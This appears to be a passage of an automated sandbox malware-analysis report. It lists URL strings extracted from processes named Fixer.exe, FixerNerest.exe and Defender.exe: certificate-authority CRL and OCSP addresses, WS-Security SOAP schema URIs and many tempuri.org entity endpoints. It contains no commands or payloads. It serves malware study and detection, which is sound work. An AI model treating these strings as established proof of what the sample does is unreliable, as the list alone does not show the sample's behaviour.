                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ocsp.sectigo.com0$
                  Source: Fixer.exe, 00000000.00000002.2248608403.0000000009490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://s.symcd.com06
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.00000000027E6000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 0000000B.00000002.2583497749.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2754426575.0000000002546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
